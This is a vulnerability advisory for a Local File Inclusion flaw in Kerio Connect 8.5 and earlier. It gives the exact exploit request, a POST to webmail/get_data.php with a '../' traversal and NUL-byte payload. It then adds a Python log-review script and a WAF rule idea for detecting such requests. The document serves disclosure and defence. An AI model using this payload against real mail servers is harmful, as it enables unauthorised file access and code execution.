SUBJECT:
Kerio Connect <= 8.5 - Local File Inclusion Vulnerability
DATE(S) ISSUED:
20/05/2015
DISCOVERER:
b4dboy
OVERVIEW:
A Local File Inclusion vulnerability has been discovered in Kerio Connect. Exploitation could allow a remote attacker to execute arbitrary code.
SYSTEMS AFFECTED:
Kerio Connect <= 8.5
SEVERITY LEVEL:
Very High
TESTED:
POST https://connect.demo.kerio.com/webmail/get_data.php
command=../../../store/tmp/upload/admin-en@demo.kerio.com/6f94c22ad0/efc91192%00
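
Added example (not part of the original advisory and not Kerio code): a log-review check that flags POST bodies sent to get_data.php whose command parameter carries a parent-directory segment or a NUL byte, as in the request above. The sample bodies are constructed, and getFolderList is a hypothetical benign value.

```python
from urllib.parse import unquote_to_bytes

# Constructed sample POST bodies for /webmail/get_data.php (not captured traffic).
# The first is the advisory's own request; "getFolderList" is a hypothetical value.
SAMPLE_BODIES = [
    "command=../../../store/tmp/upload/admin-en@demo.kerio.com/6f94c22ad0/efc91192%00",
    "command=getFolderList",
    "command=%252e%252e%252fstore%252ftmp",
]


def fully_decode(raw, max_rounds=3):
    """Percent-decode repeatedly so nested encoding cannot hide '..' or NUL."""
    data = raw.encode("latin-1", "replace")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    return data


def inspect_command(body):
    """Return the reasons a form-encoded body resembles the advisory's request."""
    reasons = []
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        if fully_decode(name) != b"command":
            continue
        # Treat backslashes as separators so both path styles are covered.
        decoded = fully_decode(value).replace(b"\\", b"/")
        if b"\x00" in decoded:
            reasons.append("nul-byte")
        if b".." in decoded.split(b"/"):
            reasons.append("path-traversal")
    return reasons


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        hits = inspect_command(body)
        print("ALERT" if hits else "ok   ", hits, body)
```

The same two conditions can be applied as a reject rule in a reverse proxy or WAF in front of affected versions.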